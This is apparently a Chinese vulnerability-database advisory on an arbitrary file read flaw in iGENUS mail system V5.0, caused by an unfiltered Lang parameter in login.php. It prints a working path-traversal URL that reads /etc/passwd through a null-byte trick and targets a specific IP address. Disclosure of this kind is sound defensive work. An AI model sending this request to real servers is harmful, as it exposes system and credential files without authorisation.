iGENUS 邮件系统 V5.0 任意文件读取漏洞

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

login.php 文件中,选择语言环境后会读取语言文件,并加载到页面,后台接到请求后,没有对 Lang 参数过滤,就直接读取文件,从而造成任意文件读取漏洞。 ``` http://221.130.182.230/igenus/login.php?Lang=../../../../../../../../../../etc/passwd%00.jpg ```

0%
暂无可用Exp或PoC
当前有0条受影响产品信息